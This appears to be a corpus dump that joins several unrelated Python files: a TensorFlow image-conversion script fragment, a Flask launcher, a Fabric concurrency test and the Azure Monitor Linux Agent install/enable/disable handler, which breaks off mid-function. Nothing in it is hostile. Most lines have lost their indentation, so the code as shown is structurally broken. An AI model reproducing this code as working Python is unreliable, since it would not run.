name, _ = os.path.splitext(os.path.basename(src_path))
dst_path = os.path.join(a.output_dir, name + ".png")
if not os.path.exists(dst_path):
src_paths.append(src_path)
dst_paths.append(dst_path)
global total
total = len(src_paths)
if a.workers == 1:
with tf.Session() as sess:
for src_path, dst_path in zip(src_paths, dst_paths):
process(src_path, dst_path)
complete()
else:
        queue = tf.train.input_producer(list(zip(src_paths, dst_paths)), shuffle=False, num_epochs=1)
dequeue_op = queue.dequeue()
def worker(coord):
with sess.as_default():
while not coord.should_stop():
try:
src_path, dst_path = sess.run(dequeue_op)
except tf.errors.OutOfRangeError:
coord.request_stop()
break
process(src_path, dst_path)
complete()
# init epoch counter for the queue
local_init_op = tf.local_variables_initializer()
with tf.Session() as sess:
sess.run(local_init_op)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(a.workers):
t = threading.Thread(target=worker, args=(coord,))
t.start()
threads.append(t)
try:
coord.join(threads)
except KeyboardInterrupt:
coord.request_stop()
coord.join(threads)
if __name__ == '__main__':
main()
|
main.py
|
from corylus.app import app
from corylus.huey_tasks.consumer import task_consumer
from multiprocessing import Process
if __name__ == '__main__':
process = Process(target=task_consumer)
process.start()
app.run(debug=True)
process.join()
|
concurrency.py
|
import codecs
from invoke.vendor.six.moves.queue import Queue
from invoke.vendor.six.moves import zip_longest
from invoke.util import ExceptionHandlingThread
from spec import Spec, ok_, skip
from fabric import Connection
_words = '/usr/share/dict/words'
def _worker(queue, cxn, start, num_words, count, expected):
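    # Read this connection's slice of the words file remotely: `tail -n (num_words - start)`
    # keeps everything from line `start` onward and `head -n count` trims it to the chunk,
    # so the result should equal expected (data[start:start + count]).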
tail = num_words - start
cmd = "tail -n {} {} | head -n {}".format(
tail, _words, count,
)
stdout = cxn.run(cmd, hide=True).stdout
result = [x.strip() for x in stdout.splitlines()]
queue.put((cxn, result, expected))
class concurrency(Spec):
# TODO: still useful to use Group API here? Where does this responsibility
# fall between Group and Executor (e.g. phrasing this specifically as a
# generic subcase of Invoke level task parameterization)?
# TODO: spin up multiple temp SSHDs / Paramiko servers / ???
def setup(self):
cxn1 = Connection('localhost')
cxn2 = Connection('localhost')
cxn3 = Connection('localhost')
self.cxns = (cxn1, cxn2, cxn3)
def connections_objects_do_not_share_connection_state(self):
cxn1, cxn2, cxn3 = self.cxns
[x.open() for x in self.cxns]
# Prove no exterior connection caching, socket reuse, etc
# NOTE: would phrase these as chained 'is not' but pep8 linter is being
# stupid :(
ok_(cxn1 is not cxn2)
ok_(cxn2 is not cxn3)
ok_(cxn1.client is not cxn2.client)
ok_(cxn2.client is not cxn3.client)
ports = [x.transport.sock.getsockname()[1] for x in self.cxns]
        ok_(ports[0] != ports[1] != ports[2])
def manual_threading_works_okay(self):
# TODO: needs https://github.com/pyinvoke/invoke/issues/438 fixed
# before it will reliably pass
skip()
# Kind of silly but a nice base case for "how would someone thread this
# stuff; and are there any bizarre gotchas lurking in default
# config/context/connection state?"
# Specifically, cut up the local (usually 100k's long) words dict into
# per-thread chunks, then read those chunks via shell command, as a
# crummy "make sure each thread isn't polluting things like stored
# stdout" sanity test
queue = Queue()
# TODO: skip test on Windows or find suitable alternative file
with codecs.open(_words, encoding='utf-8') as fd:
data = [x.strip() for x in fd.readlines()]
threads = []
num_words = len(data)
        chunksize = len(data) // len(self.cxns)  # floor division so slice indices stay ints
for i, cxn in enumerate(self.cxns):
start = i * chunksize
end = max([start + chunksize, num_words])
chunk = data[start:end]
kwargs = dict(
queue=queue,
cxn=cxn,
start=start,
num_words=num_words,
count=len(chunk),
expected=chunk,
)
thread = ExceptionHandlingThread(target=_worker, kwargs=kwargs)
threads.append(thread)
for t in threads:
t.start()
for t in threads:
t.join(5) # Kinda slow, but hey, maybe the test runner is hot
while not queue.empty():
cxn, result, expected = queue.get(block=False)
for resultword, expectedword in zip_longest(result, expected):
err = u"({2!r}, {3!r}->{4!r}) {0!r} != {1!r}".format(
resultword, expectedword, cxn, expected[0], expected[-1],
)
assert resultword == expectedword, err
|
agent.py
|
#!/usr/bin/env python
#
# AzureMonitoringLinuxAgent Extension
#
# Copyright 2021 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
# future imports have no effect on python 3 (verified in official docs)
# importing from source causes import errors on python 3, lets skip import
if sys.version_info[0] < 3:
from future import standard_library
standard_library.install_aliases()
from builtins import str
import os
import os.path
import datetime
import signal
import pwd
import grp
import re
import filecmp
import stat
import traceback
import time
import platform
import subprocess
import json
import base64
import inspect
import urllib.request, urllib.parse, urllib.error
import shutil
import crypt
import xml.dom.minidom
import hashlib
from distutils.version import LooseVersion
from hashlib import sha256
from shutil import copyfile
from threading import Thread
import telegraf_utils.telegraf_config_handler as telhandler
import metrics_ext_utils.metrics_constants as metrics_constants
import metrics_ext_utils.metrics_ext_handler as me_handler
import metrics_ext_utils.metrics_common_utils as metrics_utils
try:
from Utils.WAAgentUtil import waagent
import Utils.HandlerUtil as HUtil
except Exception as e:
# These utils have checks around the use of them; this is not an exit case
print('Importing utils failed with error: {0}'.format(e))
# This code is taken from the omsagent's extension wrapper.
# This same monkey patch fix is relevant for AMA extension as well.
# This monkey patch duplicates the one made in the waagent import above.
# It is necessary because on 2.6, the waagent monkey patch appears to be overridden
# by the python-future subprocess.check_output backport.
if sys.version_info < (2,7):
def check_output(*popenargs, **kwargs):
r"""Backport from subprocess module from python 2.7"""
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise subprocess.CalledProcessError(retcode, cmd, output=output)
return output
# Exception classes used by this module.
class CalledProcessError(Exception):
def __init__(self, returncode, cmd, output=None):
self.returncode = returncode
self.cmd = cmd
self.output = output
def __str__(self):
return "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode)
subprocess.check_output = check_output
subprocess.CalledProcessError = CalledProcessError
# Global Variables
PackagesDirectory = 'packages'
# The BundleFileName values will be replaced by actual values in the release pipeline. See apply_version.sh.
BundleFileNameDeb = 'azuremonitoragent.deb'
BundleFileNameRpm = 'azuremonitoragent.rpm'
BundleFileName = ''
TelegrafBinName = 'telegraf'
InitialRetrySleepSeconds = 30
PackageManager = ''
PackageManagerOptions = ''
MdsdCounterJsonPath = '/etc/opt/microsoft/azuremonitoragent/config-cache/metricCounters.json'
# Commands
AMAInstallCommand = ''
AMAUninstallCommand = ''
AMAServiceStartCommand = ''
AMAServiceStopCommand = ''
AMAServiceStatusCommand = ''
# Error codes
DPKGLockedErrorCode = 56
MissingorInvalidParameterErrorCode = 53
UnsupportedOperatingSystem = 51
IndeterminateOperatingSystem = 51
# Configuration
HUtilObject = None
SettingsSequenceNumber = None
HandlerEnvironment = None
SettingsDict = None
# Change permission of log path - if we fail, that is not an exit case
try:
ext_log_path = '/var/log/azure/'
if os.path.exists(ext_log_path):
        os.chmod(ext_log_path, 0o700)  # octal, i.e. rwx for owner only
except:
pass
def main():
"""
Main method
Parse out operation from argument, invoke the operation, and finish.
"""
init_waagent_logger()
waagent_log_info('Azure Monitoring Agent for Linux started to handle.')
# Determine the operation being executed
operation = None
try:
option = sys.argv[1]
if re.match('^([-/]*)(disable)', option):
operation = 'Disable'
elif re.match('^([-/]*)(uninstall)', option):
operation = 'Uninstall'
elif re.match('^([-/]*)(install)', option):
operation = 'Install'
elif re.match('^([-/]*)(enable)', option):
operation = 'Enable'
elif re.match('^([-/]*)(update)', option):
operation = 'Update'
elif re.match('^([-/]*)(metrics)', option):
operation = 'Metrics'
elif re.match('^([-/]*)(arc)', option):
operation = 'Arc'
except Exception as e:
waagent_log_error(str(e))
if operation is None:
log_and_exit('Unknown', 1, 'No valid operation provided')
# Set up for exit code and any error messages
exit_code = 0
message = '{0} succeeded'.format(operation)
# Avoid entering broken state where manual purge actions are necessary in low disk space scenario
destructive_operations = ['Disable', 'Uninstall']
if operation not in destructive_operations:
exit_code = check_disk_space_availability()
if exit_code != 0:
message = '{0} failed due to low disk space'.format(operation)
log_and_exit(operation, exit_code, message)
# Invoke operation
try:
global HUtilObject
HUtilObject = parse_context(operation)
exit_code, output = operations[operation]()
# Exit code 1 indicates a general problem that doesn't have a more
# specific error code; it often indicates a missing dependency
if exit_code == 1 and operation == 'Install':
message = 'Install failed with exit code 1. Please check that ' \
'dependencies are installed. For details, check logs ' \
'in /var/log/azure/Microsoft.Azure.Monitor' \
'.AzureMonitorLinuxAgent'
        elif exit_code == DPKGLockedErrorCode and operation == 'Install':
message = 'Install failed with exit code {0} because the ' \
'package manager on the VM is currently locked: ' \
'please wait and try again'.format(DPKGLockedErrorCode)
elif exit_code != 0:
message = '{0} failed with exit code {1} {2}'.format(operation,
exit_code, output)
except AzureMonitorAgentForLinuxException as e:
exit_code = e.error_code
message = e.get_error_message(operation)
except Exception as e:
exit_code = 1
message = '{0} failed with error: {1}\n' \
'Stacktrace: {2}'.format(operation, e,
traceback.format_exc())
# Finish up and log messages
log_and_exit(operation, exit_code, message)
def check_disk_space_availability():
"""
Check if there is the required space on the machine.
"""
try:
if get_free_space_mb("/var") < 500 or get_free_space_mb("/etc") < 500 or get_free_space_mb("/opt") < 500 :
# 52 is the exit code for missing dependency i.e. disk space
# https://github.com/Azure/azure-marketplace/wiki/Extension-Build-Notes-Best-Practices#error-codes-and-messages-output-to-stderr
return 52
else:
return 0
except:
print('Failed to check disk usage.')
return 0
def get_free_space_mb(dirname):
"""
Get the free space in MB in the directory path.
"""
st = os.statvfs(dirname)
return (st.f_bavail * st.f_frsize) // (1024 * 1024)
def is_systemd():
"""
Check if the system is using systemd
"""
return os.path.isdir("/run/systemd/system")
def get_service_name():
public_settings, protected_settings = get_settings()
if public_settings is not None and public_settings.get("GCS_AUTO_CONFIG") == True:
return "azuremonitoragentmgr"
else:
return "azuremonitoragent"
def install():
"""
Ensure that this VM distro and version are supported.
Install the Azure Monitor Linux Agent package, using retries.
Note: install operation times out from WAAgent at 15 minutes, so do not
wait longer.
"""
global AMAInstallCommand
find_package_manager("Install")
exit_if_vm_not_supported('Install')
vm_dist, vm_ver = find_vm_distro('Install')
# Check if SUSE 15 VMs have /sbin/insserv package (required for AMA 1.14.4+)
if (vm_dist.lower().startswith('suse') or vm_dist.lower().startswith('sles')) and vm_ver.startswith('15'):
check_insserv, _ = run_command_and_log("which insserv")
if check_insserv != 0:
hutil_log_info("'insserv-compat' package missing from SUSE 15 machine, installing to allow AMA to run.")
insserv_exit_code, insserv_output = run_command_and_log("zypper --non-interactive install insserv-compat")
if insserv_exit_code != 0:
return insserv_exit_code, insserv_output
public_settings, protected_settings = get_settings()
package_directory = os.path.join(os.getcwd(), PackagesDirectory)
bundle_path = os.path.join(package_directory, BundleFileName)
    os.chmod(bundle_path, 0o100)
print(PackageManager, " and ", BundleFileName)
AMAInstallCommand = "{0} {1} -i {2}".format(PackageManager, PackageManagerOptions, bundle_path)
hutil_log_info('Running command "{0}"'.format(AMAInstallCommand))
# Retry, since install can fail due to concurrent package operations
exit_code, output = run_command_with_retries_output(AMAInstallCommand, retries = 15,
retry_check = retry_if_dpkg_locked,
final_check = final_check_if_dpkg_locked)
# Set task limits to max of 65K in suse 12
# Based on Task 9764411: AMA broken after 1.7 in sles 12 - https://dev.azure.com/msazure/One/_workitems/edit/9764411
if vm_dist.lower().startswith('suse'):
try:
suse_exit_code, suse_output = run_command_and_log("mkdir -p /etc/systemd/system/azuremonitoragent.service.d")
if suse_exit_code != 0:
return suse_exit_code, suse_output
suse_exit_code, suse_output = run_command_and_log("echo '[Service]' > /etc/systemd/system/azuremonitoragent.service.d/override.conf")
if suse_exit_code != 0:
return suse_exit_code, suse_output
suse_exit_code, suse_output = run_command_and_log("echo 'TasksMax=65535' >> /etc/systemd/system/azuremonitoragent.service.d/override.conf")
if suse_exit_code != 0:
return suse_exit_code, suse_output
suse_exit_code, suse_output = run_command_and_log("systemctl daemon-reload")
if suse_exit_code != 0:
return suse_exit_code, suse_output
except:
log_and_exit("install", MissingorInvalidParameterErrorCode, "Failed to update /etc/systemd/system/azuremonitoragent.service.d for suse 12,15" )
default_configs = {
"MDSD_CONFIG_DIR" : "/etc/opt/microsoft/azuremonitoragent",
"MDSD_LOG_DIR" : "/var/opt/microsoft/azuremonitoragent/log",
"MDSD_ROLE_PREFIX" : "/run/azuremonitoragent/default",
"MDSD_SPOOL_DIRECTORY" : "/var/opt/microsoft/azuremonitoragent",
"MDSD_OPTIONS" : "\"-A -c /etc/opt/microsoft/azuremonitoragent/mdsd.xml -d -r $MDSD_ROLE_PREFIX -S $MDSD_SPOOL_DIRECTORY/eh -L $MDSD_SPOOL_DIRECTORY/events\"",
"ENABLE_MCS" : "false",
"MONITORING_USE_GENEVA_CONFIG_SERVICE" : "false",
"MDSD_USE_LOCAL_PERSISTENCY" : "true",
#"OMS_TLD" : "int2.microsoftatlanta-int.com",
#"customResourceId" : "/subscriptions/42e7aed6-f510-46a2-8597-a5fe2e15478b/resourcegroups/amcs-test/providers/Microsoft.OperationalInsights/workspaces/amcs-pretend-linuxVM",
}
# Decide the mode
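    # Three onboarding paths follow: GCS_AUTO_CONFIG hands configuration to
    # azuremonitoragentmgr; otherwise, with no protected settings (or an application-mode
    # proxy) MCS is enabled; otherwise Geneva Config Service is configured from the
    # protected settings below.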
if public_settings is not None and public_settings.get("GCS_AUTO_CONFIG") == True:
hutil_log_info("Detecting Auto-Config mode.")
return 0, ""
elif (protected_settings is None or len(protected_settings) == 0) or (public_settings is not None and "proxy" in public_settings and "mode" in public_settings.get("proxy") and public_settings.get("proxy").get("mode") == "application"):
default_configs["ENABLE_MCS"] = "true"
# fetch proxy settings
if public_settings is not None and "proxy" in public_settings and "mode" in public_settings.get("proxy") and public_settings.get("proxy").get("mode") == "application":
default_configs["MDSD_PROXY_MODE"] = "application"
if "address" in public_settings.get("proxy"):
default_configs["MDSD_PROXY_ADDRESS"] = public_settings.get("proxy").get("address")
else:
log_and_exit("install", MissingorInvalidParameterErrorCode, 'Parameter "address" is required in proxy public setting')
if "auth" in public_settings.get("proxy") and public_settings.get("proxy").get("auth") == "true":
if protected_settings is not None and "proxy" in protected_settings and "username" in protected_settings.get("proxy") and "password" in protected_settings.get("proxy"):
default_configs["MDSD_PROXY_USERNAME"] = protected_settings.get("proxy").get("username")
default_configs["MDSD_PROXY_PASSWORD"] = protected_settings.get("proxy").get("password")
else:
log_and_exit("install", MissingorInvalidParameterErrorCode, 'Parameter "username" and "password" not in proxy protected setting')
# add managed identity settings if they were provided
identifier_name, identifier_value, error_msg = get_managed_identity()
if error_msg:
log_and_exit("Install", MissingorInvalidParameterErrorCode, 'Failed to determine managed identity settings. {0}.'.format(error_msg))
if identifier_name and identifier_value:
default_configs["MANAGED_IDENTITY"] = "{0}#{1}".format(identifier_name, identifier_value)
else:
# look for LA protected settings
for var in list(protected_settings.keys()):
if "_key" in var or "_id" in var:
default_configs[var] = protected_settings.get(var)
# check if required GCS params are available
MONITORING_GCS_CERT_CERTFILE = None
if "certificate" in protected_settings:
MONITORING_GCS_CERT_CERTFILE = base64.standard_b64decode(protected_settings.get("certificate"))
if "certificatePath" in protected_settings:
try:
with open(protected_settings.get("certificatePath"), 'r') as f:
MONITORING_GCS_CERT_CERTFILE = f.read()
except Exception as ex:
log_and_exit('Install', MissingorInvalidParameterErrorCode, 'Failed to read certificate {0}: {1}'.format(protected_settings.get("certificatePath"), ex))
MONITORING_GCS_CERT_KEYFILE = None
if "certificateKey" in protected_settings:
MONITORING_GCS_CERT_KEYFILE = base64.standard_b64decode(protected_settings.get("certificateKey"))
if "certificateKeyPath" in protected_settings:
try:
with open(protected_settings.get("certificateKeyPath"), 'r') as f:
MONITORING_GCS_CERT_KEYFILE = f.read()
except Exception as ex:
log_and_exit('Install', MissingorInvalidParameterErrorCode, 'Failed to read certificate key {0}: {1}'.format(protected_settings.get("certificateKeyPath"), ex))
MONITORING_GCS_ENVIRONMENT = ""
if "monitoringGCSEnvironment" in protected_settings:
MONITORING_GCS_ENVIRONMENT = protected_settings.get("monitoringGCSEnvironment")
MONITORING_GCS_NAMESPACE = ""
if "namespace" in protected_settings:
MONITORING_GCS_NAMESPACE = protected_settings.get("namespace")
MONITORING_GCS_ACCOUNT = ""
if "monitoringGCSAccount" in protected_settings:
MONITORING_GCS_ACCOUNT = protected_settings.get("monitoringGCSAccount")
MONITORING_GCS_REGION = ""
if "monitoringGCSRegion" in protected_settings:
MONITORING_GCS_REGION = protected_settings.get("monitoringGCSRegion")
MONITORING_CONFIG_VERSION = ""
if "configVersion" in protected_settings:
MONITORING_CONFIG_VERSION = protected_settings.get("configVersion")
MONITORING_GCS_AUTH_ID_TYPE = ""
if "monitoringGCSAuthIdType" in protected_settings:
MONITORING_GCS_AUTH_ID_TYPE = protected_settings.get("monitoringGCSAuthIdType")
MONITORING_GCS_AUTH_ID = ""
if "monitoringGCSAuthId" in protected_settings:
MONITORING_GCS_AUTH_ID = protected_settings.get("monitoringGCSAuthId")
MONITORING_TENANT = ""
if "monitoringTenant" in protected_settings:
MONITORING_TENANT = protected_settings.get("monitoringTenant")
MONITORING_ROLE = ""
if "monitoringRole" in protected_settings:
MONITORING_ROLE = protected_settings.get("monitoringRole")
MONITORING_ROLE_INSTANCE = ""
if "monitoringRoleInstance" in protected_settings:
MONITORING_ROLE_INSTANCE = protected_settings.get("monitoringRoleInstance")
if ((MONITORING_GCS_CERT_CERTFILE is None or MONITORING_GCS_CERT_KEYFILE is None) and (MONITORING_GCS_AUTH_ID_TYPE == "")) or MONITORING_GCS_ENVIRONMENT == "" or MONITORING_GCS_NAMESPACE == "" or MONITORING_GCS_ACCOUNT == "" or MONITORING_GCS_REGION == "" or MONITORING_CONFIG_VERSION == "":
waagent_log_error('Not all required GCS parameters are provided')
raise ParameterMissingException
else:
# set the values for GCS
default_configs["MONITORING_USE_GENEVA_CONFIG_SERVICE"] = "true"
default_configs["MONITORING_GCS_ENVIRONMENT"] = MONITORING_GCS_ENVIRONMENT
default_configs["MONITORING_GCS_NAMESPACE"] = MONITORING_GCS_NAMESPACE
default_configs["MONITORING_GCS_ACCOUNT"] = MONITORING_GCS_ACCOUNT
default_configs["MONITORING_GCS_REGION"] = MONITORING_GCS_REGION
default_configs["MONITORING_CONFIG_VERSION"] = MONITORING_CONFIG_VERSION
# write the certificate and key to disk
uid = pwd.getpwnam("syslog").pw_uid
gid = grp.getgrnam("syslog").gr_gid
if MONITORING_GCS_AUTH_ID_TYPE != "":
default_configs["MONITORING_GCS_AUTH_ID_TYPE"] = MONITORING_GCS_AUTH_ID_TYPE
if MONITORING_GCS_AUTH_ID != "":
default_configs["MONITORING_GCS_AUTH_ID"] = MONITORING_GCS_AUTH_ID
if MONITORING_GCS_CERT_CERTFILE is not None:
default_configs["MONITORING_GCS_CERT_CERTFILE"] = "/etc/opt/microsoft/azuremonitoragent/gcscert.pem"
fh = open("/etc/opt/microsoft/azuremonitoragent/gcscert.pem", "wb")
fh.write(MONITORING_GCS_CERT_CERTFILE)
fh.close()
os.chown("/etc/opt/microsoft/azuremonitoragent/gcscert.pem", uid, gid)
os.system('chmod {1} {0}'.format("/etc/opt/microsoft/azuremonitoragent/gcscert.pem", 400))
if MONITORING_GCS_CERT_KEYFILE is not None:
default_configs["MONITORING_GCS_CERT_KEYFILE"] = "/etc/opt/microsoft/azuremonitoragent/gcskey.pem"
fh = open("/etc/opt/microsoft/azuremonitoragent/gcskey.pem", "wb")
fh.write(MONITORING_GCS_CERT_KEYFILE)
fh.close()
os.chown("/etc/opt/microsoft/azuremonitoragent/gcskey.pem", uid, gid)
os.system('chmod {1} {0}'.format("/etc/opt/microsoft/azuremonitoragent/gcskey.pem", 400))
if MONITORING_TENANT != "":
default_configs["MONITORING_TENANT"] = MONITORING_TENANT
if MONITORING_ROLE != "":
default_configs["MONITORING_ROLE"] = MONITORING_ROLE
            if MONITORING_ROLE_INSTANCE != "":
default_configs["MONITORING_ROLE_INSTANCE"] = MONITORING_ROLE_INSTANCE
config_file = "/etc/default/azuremonitoragent"
config_updated = False
try:
if os.path.isfile(config_file):
data = []
new_data = ""
vars_set = set()
dependent_vars = ["MDSD_OPTIONS"]
# Scope to only dependent envvar being set by extension wrapper
dependent_vars = set(default_configs.keys()).intersection(dependent_vars)
# Copy existing comments/envvar to the updated defaults file; replace existing envvar values if appropriate
with open(config_file, "r") as f:
data = f.readlines()
for line in data:
# Skip definitions of dependent envvar until very end
skip_line = False
for var in dependent_vars:
if "export {0}".format(var) in line:
skip_line = True
break
if skip_line:
continue
for var in list(default_configs.keys()):
if "export {0}".format(var) in line and var not in dependent_vars:
line = "export " + var + "=" + default_configs[var] + "\n"
vars_set.add(var)
break
new_data += line
# Set remaining non-dependent envvar that weren't present in the old defaults file
for var in list(default_configs.keys()):
if var not in vars_set and var not in dependent_vars:
new_data += "export " + var + "=" + default_configs[var] + "\n"
            # Finally, set envvar with dependencies (e.g. MDSD_OPTIONS references MDSD_ROLE_PREFIX and MDSD_SPOOL_DIRECTORY)
for var in dependent_vars:
new_data += "export " + var + "=" + default_configs[var] + "\n"
vars_set.add(var)
with open("/etc/default/azuremonitoragent_temp", "w") as f:
f.write(new_data)
config_updated = True if len(new_data) > 0 else False
if not config_updated or not os.path.isfile("/etc/default/azuremonitoragent_temp"):
log_and_exit("install",MissingorInvalidParameterErrorCode, "Error while updating MCS Environment Variables in /etc/default/azuremonitoragent")
os.remove(config_file)
os.rename("/etc/default/azuremonitoragent_temp", config_file)
uid = pwd.getpwnam("syslog").pw_uid
gid = grp.getgrnam("syslog").gr_gid
os.chown(config_file, uid, gid)
os.system('chmod {1} {0}'.format(config_file, 400))
else:
log_and_exit("install", MissingorInvalidParameterErrorCode, "Could not find the file - /etc/default/azuremonitoragent" )
except:
log_and_exit("install", MissingorInvalidParameterErrorCode, "Failed to add MCS Environment Variables in /etc/default/azuremonitoragent" )
return exit_code, output
def check_kill_process(pstring):
for line in os.popen("ps ax | grep " + pstring + " | grep -v grep"):
fields = line.split()
pid = fields[0]
os.kill(int(pid), signal.SIGKILL)
def uninstall():
"""
Uninstall the Azure Monitor Linux Agent.
This is a somewhat soft uninstall. It is not a purge.
Note: uninstall operation times out from WAAgent at 5 minutes
"""
global AMAUninstallCommand
find_package_manager("Uninstall")
if PackageManager == "dpkg":
AMAUninstallCommand = "dpkg -P azuremonitoragent"
elif PackageManager == "rpm":
AMAUninstallCommand = "rpm -e azuremonitoragent"
else:
log_and_exit("Uninstall", UnsupportedOperatingSystem, "The OS has neither rpm nor dpkg" )
hutil_log_info('Running command "{0}"'.format(AMAUninstallCommand))
# Retry, since uninstall can fail due to concurrent package operations
try:
exit_code, output = run_command_with_retries_output(AMAUninstallCommand, retries = 4,
retry_check = retry_if_dpkg_locked,
final_check = final_check_if_dpkg_locked)
except Exception as ex:
exit_code = 1
output = 'Uninstall failed with error: {0}\n' \
'Stacktrace: {1}'.format(ex, traceback.format_exc())
return exit_code, output
def enable():
"""
Start the Azure Monitor Linux Agent Service
This call will return non-zero or throw an exception if
the settings provided are incomplete or incorrect.
Note: enable operation times out from WAAgent at 5 minutes
"""
global AMAServiceStartCommand, AMAServiceStatusCommand
if HUtilObject:
        if HUtilObject.is_seq_smaller():
return 0, "Current sequence number, " + HUtilObject._context._seq_no + ", is not greater than the sequence number of the most recent executed configuration. Skipping enable"
exit_if_vm_not_supported('Enable')
# Check if this is Arc VM and enable arc daemon if it is
if metrics_utils.is_arc_installed():
hutil_log_info("This VM is an Arc VM, Running the arc watcher daemon.")
start_arc_process()
service_name = get_service_name()
# Start and enable systemd services so they are started after system reboot.
AMAServiceStartCommand = 'systemctl start {0} && systemctl enable {0}'.format(service_name)
AMAServiceStatusCommand = 'systemctl status {0}'.format(service_name)
if not is_systemd():
hutil_log_info("The VM doesn't have systemctl. Using the init.d service to start {0}.".format(service_name))
AMAServiceStartCommand = '/etc/init.d/{0} start'.format(service_name)
AMAServiceStatusCommand = '/etc/init.d/{0} status'.format(service_name)
hutil_log_info('Handler initiating onboarding.')
exit_code, output = run_command_and_log(AMAServiceStartCommand)
if exit_code == 0:
#start metrics process if enable is successful
start_metrics_process()
HUtilObject.save_seq()
else:
status_exit_code, status_output = run_command_and_log(AMAServiceStatusCommand)
if status_exit_code != 0:
output += "Output of '{0}':\n{1}".format(AMAServiceStatusCommand, status_output)
return exit_code, output
def disable():
"""
Disable Azure Monitor Linux Agent process on the VM.
Note: disable operation times out from WAAgent at 15 minutes
"""
global AMAServiceStopCommand, AMAServiceStatusCommand
# disable arc daemon if it is running
stop_arc_watcher()
#stop the metrics process
stop_metrics_process()
service_name = get_service_name()
# Stop and disable systemd services so they are not started after system reboot.
AMAServiceStopCommand = 'systemctl stop {0} && systemctl disable {0}'.format(service_name)
AMAServiceStatusCommand = 'systemctl status {0}'.format(service_name)
if not is_systemd():
hutil_log_info("The VM doesn't have systemctl. Using the init.d service to stop {0}.".format(service_name))
AMAServiceStopCommand = '/etc/init.d/{0} stop'.format(service_name)
AMAServiceStatusCommand = '/etc/init.d/{0} status'.format(service_name)
exit_code, output = run_command_and_log(AMAServiceStopCommand)
if exit_code != 0:
status_exit_code, status_output = run_command_and_log(AMAServiceStatusCommand)
if status_exit_code != 0:
output += "Output of '{0}':\n{1}".format(AMAServiceStatusCommand, status_output)
return exit_code, output
def update():
"""
Update the current installation of AzureMonitorLinuxAgent
    No logic to install the agent is needed here, as install() will be called
    along with update because upgradeMode = "UpgradeWithInstall" is set in HandlerManifest
"""
return 0, ""
def get_managed_identity():
"""
    Determine Managed Identity (MI) settings.
    Nomenclature: Managed System Identity (MSI), System-Assigned Identity (SAI), User-Assigned Identity (UAI)
    Unspecified MI scenario: MSI returns the SAI token if one exists, otherwise the UAI token if exactly one UAI exists, otherwise it fails
    Specified MI scenario: MSI returns the token for the specified MI
    Returns identifier_name, identifier_value, and an error message (if any)
"""
identifier_name = identifier_value = ""
public_settings, protected_settings = get_settings()
if public_settings is not None and "authentication" in public_settings and "managedIdentity" in public_settings.get("authentication"):
managedIdentity = public_settings.get("authentication").get("managedIdentity")
if "identifier-name" not in managedIdentity or "identifier-value" not in managedIdentity:
return identifier_name, identifier_value, 'Parameters "identifier-name" and "identifier-value" are both required in authentication.managedIdentity public setting'
identifier_name = managedIdentity.get("identifier-name")
identifier_value = managedIdentity.get("identifier-value")
if identifier_name not in ["object_id", "client_id", "mi_res_id"]:
return identifier_name, identifier_value, 'Invalid identifier-name provided; must be "object_id", "client_id", or "mi_res_id"'
if not identifier_value:
return identifier_name, identifier_value, 'Invalid identifier-value provided; cannot be empty'
if identifier_name in ["object_id", "client_id"]:
guid_re = re.compile(r'[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')
if not guid_re.search(identifier_value):
return identifier_name, identifier_value, 'Invalid identifier-value provided for {0}; must be a GUID'.format(identifier_name)
return identifier_name, identifier_value, ""
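# Illustrative sketch only: the public settings shape that get_managed_identity()
# parses when a managed identity is explicitly configured. The keys below come from
# the checks above; the GUID value is made up for the example.
_EXAMPLE_MANAGED_IDENTITY_PUBLIC_SETTINGS = {
    "authentication": {
        "managedIdentity": {
            "identifier-name": "client_id",
            "identifier-value": "11111111-2222-3333-4444-555555555555"
        }
    }
}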
def stop_metrics_process():
if telhandler.is_running(is_lad=False):
#Stop the telegraf and ME services
tel_out, tel_msg = telhandler.stop_telegraf_service(is_lad=False)
if tel_out:
hutil_log_info(tel_msg)
else:
hutil_log_error(tel_msg)
#Delete the telegraf and ME services
tel_rm_out, tel_rm_msg = telhandler.remove_telegraf_service()
if tel_rm_out:
hutil_log_info(tel_rm_msg)
else:
hutil_log_error(tel_rm_msg)
if me_handler.is_running(is_lad=False):
me_out, me_msg = me_handler.stop_metrics_service(is_lad=False)
if me_out:
hutil_log_info(me_msg)
else:
hutil_log_error(me_msg)
me_rm_out, me_rm_msg = me_handler.remove_metrics_service(is_lad=False)
if me_rm_out:
hutil_log_info(me_rm_msg)
else:
hutil_log_error(me_rm_msg)
pids_filepath = os.path.join(os.getcwd(),'amametrics.pid')
# kill existing metrics watcher
if os.path.exists(pids_filepath):
with open(pids_filepath, "r") as f:
for pid in f.readlines():
# Verify the pid actually belongs to AMA metrics watcher.
cmd_file = os.path.join("/proc", str(pid.strip("\n")), "cmdline")
if os.path.exists(cmd_file):
with open(cmd_file, "r") as pidf:
cmdline = pidf.readlines()
if cmdline[0].find("agent.py") >= 0 and cmdline[0].find("-metrics") >= 0:
kill_cmd = "kill " + pid
run_command_and_log(kill_cmd)
run_command_and_log("rm "+pids_filepath)
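# For reference, the pid verification above reads /proc/<pid>/cmdline to make sure the
# recorded pid still belongs to the AMA metrics watcher (a command line containing both
# 'agent.py' and '-metrics') before killing it. Pid and contents below are examples only;
# /proc cmdline entries are NUL-separated:
#   /proc/12345/cmdline -> 'python3\x00agent.py\x00-metrics'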
def start_metrics_process():
"""
Start metrics process that performs periodic monitoring activities
:return: None
"""
stop_metrics_process()
# Start metrics watcher
ama_path = os.path.join(os.getcwd(), 'agent.py')
args = ['python{0}'.format(sys.version_info[0]), ama_path, '-metrics']
log = open(os.path.join(os.getcwd(), 'daemon.log'), 'w')
